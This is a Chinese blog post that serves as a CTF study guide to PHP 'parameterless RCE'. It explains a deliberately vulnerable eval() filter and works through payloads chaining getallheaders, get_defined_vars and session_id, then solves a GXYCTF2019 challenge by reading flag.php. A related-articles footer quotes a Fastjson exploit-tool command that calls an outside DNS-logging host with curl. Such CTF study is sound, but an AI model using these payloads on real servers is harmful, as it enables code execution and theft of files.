无参数RCE总结

最新推荐文章于 2023-11-07 20:14:02 发布
最新推荐文章于 2023-11-07 20:14:02 发布
阅读量5.5k 收藏 70
点赞数 21
分类专栏: 无参数rce 网络安全 web 文章标签: php 网络安全
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/Manuffer/article/details/120738755
版权

文章目录

知识点

概念

无参数RCE,其实就是通过没有参数的函数达到命令执行的目的。
没有参数的函数什么意思?一般该类题目代码如下(或类似):

<?php
	if(';' === preg_replace('/[a-z,_]+\((?R)?\)/', NULL, $_GET['exp']){
 		     eval($_GET['exp']);
	}
?>

先来解读下代码:

  • 如果';'===preg_replace(...),那么就执行exp传递的命令
  • \ : 转义字符不多说了
  • [a-z,_]+ : [a-z,_]匹配小写字母和下划线 +表示1到多个
  • (?R)? : (?R)代表当前表达式,就是这个(/[a-z,_]+((?R)?)/),所以会一直递归,?表示递归当前表达式0次或1次(若是(?R)*则表示递归当前表达式0次或多次,例如它可以匹配a(b(c()d()))

简单说来就是:这串代码检查了我们通过GET方式传入的exp参数的值,如果传进去的值是传进去的值是字符串接一个(),那么字符串就会被替换为空。如果(递归)替换后的字符串只剩下;,那么我们传进去的 exp 就会被 eval 执行。比如我们传入一个 phpinfo();,它被替换后就只剩下;,那么根据判断条件就会执行phpinfo();

(?R)?能匹配的只有a(); a(b()); a(b(c()));这种类型的。比如传入a(b(c()));,第一次匹配后,就剩a(b());,第二次匹配后,a();,第三次匹配后就只剩下;了,最后a(b(c()));就会被eval执行。

常见绕过姿势

1、getallheaders()

在这里插入图片描述getallheaders()返回所有的HTTP头信息,但是要注意的一点是这个函数返回的是一个数组,而eval()要求的参数是一个字符串,所以这里不能直接用,这时我们就要想办法将数组转换为字符串。正好implode()这个函数就能胜任。
在这里插入图片描述
implode()能够直接将getallheaders()返回的数组转化为字符串。
本地测试代码:

<?php
	echo implode(getallheaders());
?>

在这里插入图片描述

可以看到获取到的头信息被当作字符串输出了,且是从最后开始输出(由于php版本不同,输出顺序也可能不同),那么我们就可以在最后随意添加一个头,插入我们的恶意代码并将后面的内容注释掉。
在这里插入图片描述

payload:?exp=eval(implode(getallheaders()));

该图来自csdn的noViC4,我自己没有成功

2、get_defined_vars()

在这里插入图片描述

该函数的作用是获取所有的已定义变量,返回值也是数组。不过这个函数返回的是一个二维数组,所以不能与implode结合起来用。将get_defined_vars()的结果用var_dump()输出结果如下:

<?php
	var_dump(get_defined_vars());
?>

在这里插入图片描述

可以看到用GET传入的参数会被显示在数组中的第一位:
在这里插入图片描述
不过这里有这么多的数组,我们也不需要全部查看是吧?那么使用current()函数就可以办成这个事情:
在这里插入图片描述

函数可以返回数组中的单元且初始指针指向数组的第一个单元。因为GET方式传入的参数存在该二维数组中的第一个一维数组(也就是上图array(7)中的第一个数组["_GET"]=> array(1) { ["get"]=> string(1) "a" }),所以我们可以通过这个函数将其取出来(官方这个演示很详细了,可以自己看看)。

<?php
    var_dump(current(get_defined_vars()));
?>

在这里插入图片描述

从图中能看出后面传入的shell=phpinfo();出现在了第一个数组的最后。

end()想必你应该了解,说简单点就是将 array 的内部指针移动到最后一个单元并返回其值。

回忆一下之前的payload:?exp=eval(implode(getallheaders()));,设想下:current()是取出二维数组中的第一个(指针指向的那个)一维数组,用end()就可以取出这个一维数组中的最后那个值,加上之前的payload你能想到什么?
新payload:?exp=eval(end(current(get_defined_vars())));&shell=phpinfo();
用这个payload的话就可以执行shell的命令了(理论上可行,我这里环境有问题就不演示了)

3、session_id()

在这里插入图片描述

官方说:session_id()可以用来获取/设置当前会话 ID。
那么可以用这个函数来获取cookie中的phpsessionid了,并且这个值我们是可控的。
但其有限制:

文件会话管理器仅允许会话 ID 中使用以下字符:a-z A-Z 0-9 ,(逗号)和 - (减号)

解决方法:将参数转化为16进制传进去,之后再用hex2bin()函数转换回来就可以了。
在这里插入图片描述
所以,payload可以为:?exp=eval(hex2bin(session_id()));
但session_id必须要开启session才可以使用,所以我们要先使用session_start。
最后,payload:?exp=eval(hex2bin(session_id(session_start())));
说到这里,这套组合拳还差了点东西,你还没写你要执行的代码!
不是才说道session_id()可以获取cookie中的phpsessionid,并且这个值我们是可控的吗?所以我们可以在http头中设置PHPSESSID为想要执行代码的16进制:hex("phpinfo();")=706870696e666f28293b
所以最终组合拳这样打:
在这里插入图片描述

我的环境有问题,该图来自noViC4

配合使用的函数

  • getchwd() 函数返回当前工作目录。
  • scandir() 函数返回指定目录中的文件和目录的数组。
  • dirname() 函数返回路径中的目录部分。
  • chdir() 函数改变当前的目录。
  • readfile() 输出一个文件。
  • current() 返回数组中的当前单元, 默认取第一个值。
  • pos() current() 的别名。
  • next() 函数将内部指针指向数组中的下一个元素,并输出。
  • end() 将内部指针指向数组中的最后一个元素,并输出。
  • array_rand() 函数返回数组中的随机键名,或者如果您规定函数返回不只一个键名,则返回包含随机键名的数组。
  • array_flip() array_flip() 函数用于反转/交换数组中所有的键名以及它们关联的键值。
  • array_slice() 函数在数组中根据条件取出一段值,并返回。
  • array_reverse() 函数返回翻转顺序的数组。
  • chr() 函数从指定的 ASCII 值返回字符。
  • hex2bin() — 转换十六进制字符串为二进制字符串。
  • getenv() 获取一个环境变量的值(在7.1之后可以不给予参数)。
  • localeconv() 函数返回一包含本地数字及货币格式信息的数组。

CTF例题

[GXYCTF2019]禁止套娃

姿势一:array_reverse()

这种一打开没什么东西的题目,御剑,dirsearch常见备份文件名都去试一试。这道题是.git泄露,我这里使用的是git-extract扫出来的。
在这里插入图片描述

打开以后代码如下:
在这里插入图片描述

可以看到过滤了很多伪协议和字符(相当于过滤了很多函数)。
使用我们的第一个payload:?exp=print_r(scandir(current(localeconv())));看到flag.php的位置。
在这里插入图片描述

为什么这样写payload?

这里要知道一点:想要浏览目录内的所有文件我们常用函数scandir()。当scandir()传入.,它就可以列出当前目录的所有文件。

但这里是无参数的RCE,我们不能写scandir(.),而localeconv()却会有一个返回值,那个返回值正好就是.
在这里插入图片描述

再配合current()或者pos()不就可以把.取出来传给scandir()查看所有的文件了吗?(妙啊)

所以这个组合scandir(current(localeconv()))很常用,可以记一下。

言归正传。

现在我们知道了flag.php在数组中的倒数第二个位置,但是并没有什么函数可以直接读倒数第二个。

所以我们用array_reverse()翻转一下数组的顺序,这时flag.php就跑到第二个位置了,然后用next()读第二个不就出来了吗?

如果flag.php的位置不特殊,可以使用array_rand()array_flip()(array_rand()返回的是键名所以必须搭配array_flip()来交换键名、键值来获得键值,函数作用上面有写到)来随机刷新显示的内容,刷几次就出来了,所以这种情况payload:?exp=show_source(array_rand(array_flip(scandir(current(localeconv())))));

所以最后payload:?exp=show_source(next(array_reverse(scandir(current(localeconv())))));
在这里插入图片描述
注意这里要使用show_source,不然打印不出来。

姿势二:session_id()

这个姿势是前面讲过的,因为php不会自动开启session,所以一定要记得session_id(session_start())来开启。

虽然hex被ban了,导致无法使用hex2bin(),但是PHPSESSID本身是可以直接加上例如flag.php这类的字符的。

所以可以直接在bp里面抓包然后修改一下Cookie就可以了:

在这里插入图片描述

这个做法太ez了,你学会了吗?

最终payload:?exp=show_source(session_id(session_start()));,别忘了修改Cookie: PHPSESSID=flag.php

本文参考链接:
csdn-noViC4(链接太长只能这样了,见谅)
https://blog.csdn.net/silence1_/article/details/102835743(会长yyds,滑稽)
https://www.cnblogs.com/wangtanzhi/articles/12311239.html

L1am0ur
关注
  • 21
    点赞
  • 70
    收藏
    觉得还不错? 一键收藏
  • 7
    评论
专栏目录
无参 RCE
snowlyzz的博客
08-07 596
无参rce
初探无参数RCE
weixin_46330722的博客
12-07 2668
概念 所谓无参数RCE,就是通过没有参数的函数达到命令执行的目的。这类题目的关键代码一般长这样,后面都用这串代码当题目测试 <?php if(';' === preg_replace('/[^\W]+\((?R)?\)/', '', $_GET['exp'])) { eval($_GET['exp']); } ?> 简单解释一下这串代码。这串代码就是检查了我们通过GET方式传入的exp参数的值,如果传进去的值是传进去的值是一个字符串接一个(),那么这个字符串就会被替换为空
参数rce
qq_45570082的博客
06-07 2039
总结一下无参数rce的各种解法(为了便于自己查找,同时为了把自己收藏夹的几个相关网址删掉,每次都在别人博客找很麻烦的(手动狗头)) 首先准备代码 <?php if(';' === preg_replace('/[^\W]+\((?R)?\)/', '', $_GET['a'])) { eval($_GET['a']);} 利用session_id php中有一个函数叫session_id(),可以直接获取到cookie中的phpsessionid值,phpsessionid的组成符号有
参数RCE
m0_62422842的博客
05-11 1514
正则的递归 正则表达式中有一种递归的用法,今天才知道。但是这种递归用法并不是所有语言都支持。它适用于PHP和java等语言。 以下列出几个简单的递归 (?R)? (?0)? \g<0>? 加号 , + 星号 * 问号 ? 一般来说问号也是递归的一种 一般用到最多就是?R。 括号里不能有参数,而有些题中就就会用这种递归的正则来过滤恶意函数,所以我们就用无参的函数像上图中套娃一样注入命令。 无参数RCE 一般情况下的命令执行都是由参数的,比如system函数,eval函数 ...
ctfshow---php特性
fainpo的博客
04-02 1312
使用此管道符“|”可以将两个命令分隔开,“|”左边命令的输出就会作为“|”右边命令的输入,此命令可连续使用,第一个命令的输出会作为第二个命令的输入,第二个命令的输出又会作为第三个命令的输入,依此类推。就是比如get传入a=1第一个foreach的$key就是a,$value就是1,利用die($error) 这里退出会输出$error,所以将flag的值赋值给他就能得到flag,当然第一个if不让,所以我们利用一个跳板。_()==gettext() 是gettext()的拓展函数,开启text扩展。
php get all headers,PHP get_headers()函数详解
weixin_32123259的博客
03-19 190
定义get_headers - 取得服务器响应一个 HTTP 请求所发送的所有头信息描述get_headers ( string $url [, int $format = 0 [, resource $context ]] ) : array如果将 format 参数设为 1,则 get_headers() 返回带键值的关联数组。context 参数A valid context resourc...
WEB安全知识总结.zip
12-27
6. **远程命令执行(RCE)**:如果Web应用允许不受限制的代码执行,攻击者可能利用此漏洞执行任意系统命令。加固代码审查、限制函数调用和禁用不必要的系统服务可以减少风险。 7. **XML外部实体(XXE)漏洞**:在...
Web安全 _ 无字母数字Webshell 总结.pdf
09-06
【Web安全】无字母数字Webshell总结 在Web安全领域,Webshell是一种常见的攻击手段,用于在目标服务器上获得远程控制。无字母数字Webshell是指避开常规字母和数字字符限制的Webshell构造方法。通常,服务器会通过...
Yii框架反序列化RCE利用链分析1
08-03
总结起来,Yii2框架中的这个反序列化RCE漏洞利用链涉及到了多个类的交互,包括`BatchQueryResult`、`DbSession`和`IndexAction`。通过精心构造对象和调用链,攻击者可以执行任意代码,对系统造成严重威胁。因此,...
CTF知识总结,写的不错
10-29
- **无参数RCE**:无需参数的远程代码执行漏洞,可能出现在不安全的函数调用中。 - **Session管理**:了解如何操作和篡改PHP session,包括自定义session处理器。 - **Phar归档**:PHP的Phar归档格式允许打包PHP...
PHP getallheaders无法获取自定义头(headers)的问题
10-22
主要介绍了PHP getallheaders无法获取自定义头(headers)的问题的相关资料,需要的朋友可以参考下
三极管共射参数等效模型.docx
11-26
总结来说,三极管共射参数等效模型是一种实用的工具,它简化了三极管在低频小信号条件下的分析,使得电路设计和分析变得更加直观和简便。然而,为了精确分析高频或大信号情况,需要结合其他更复杂的模型进行研究。在...
php get_defined_vars,PHP: get_defined_vars - Manual
weixin_35255032的博客
03-26 105
Here is a function which generates a debug report for display or emailusing get_defined_vars. Great for getting a detailed snapshot withoutrelying on user input.// Usage: generateDebugReport(method,ge...
‘/[a-z_]+\((?R)?\)/‘
qq_43470425的博客
05-07 364
(?R)是引用当前表达式的意思。 即可以用\w+((?R)?)替换到(?R)的位置,因此可以衍生成匹配\w+(\w+((?R)?))、\w+(\w+(\w+((?R)?)))、等等。 (?R)? 这里多一个?表示可以有引用,也可以没有。
get_defined_vars() 函数
冷月醉雪的博客
04-24 689
查看更多 https://www.yuque.com/docs/share/6ef686e4-b03d-43c2-b74e-bde464d38ea0
无参rce
最新发布
m0_74317362的博客
11-07 128
​ 最近参加了两个CTF比赛,都遇到了无参数RCE的问题。第一次遇到虽然没解出来,但是为第二次比赛遇到做了基础铺垫,第二次也迎刃而解,同时这次比赛也学到了很多fuzz的方法和思路,在这里做个总结
php中get_headers与getallheaders的区别
weixin_34236869的博客
11-04 254
2019独角兽企业重金招聘Python工程师标准>>> ...
C语言服务器编程必备常识
xllntld的专栏
12-15 674
入门 包含了正确的头文件只能编译通过,没链接正确的库链接会报错。 一些常用的库gcc会自动链接。 库的缺省路径/lib /usr/lib /usr/local/lib 不知道某个函数在那个库可以nm -o /lib *.so | grep 函数名 man sin 会列出包含的头文件和链接的库名。man 2 sin 2表示系统调用,3表示c库函数 一旦子进程被创建,父子进程一起从fork处被创建。创建子进程为了争夺资源。 重定向用dup2函数
fastjson rce
09-16
Fastjson RCE(Remote Code Execution)是指在使用Fastjson这个Java库时,存在远程代码执行的风险。在Fastjson版本1.2.24及以下的版本中,存在RCE问题。这个问题是由于Fastjson引入了AutoType特性,但在安全方面的考虑不够周全,导致攻击者可以通过构造恶意的JSON数据来执行任意的Java代码,从而实现远程代码执行。 为了利用Fastjson RCE问题,攻击者可以使用一些工具,比如fastjson_tool.jar。通过执行类似以下命令来利用Fastjson RCE问题: ``` java -cp fastjson_tool.jar fastjson.HRMIServer 127.0.0.1 80 "curl dnslog.wyzxxz.cn" java -cp fastjson_tool.jar fastjson.HLDAPServer 127.0.0.1 80 ``` 以上命令中,HRMIServer和HLDAPServer是Fastjson工具提供的两种利用方式,它们可以远程执行指定的代码,包括通过curl命令发送HTTP请求。 值得注意的是,Fastjson RCE问题只存在于版本1.2.24及以下,因此建议使用最新版本的Fastjson以避免此安全风险。
评论 7
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值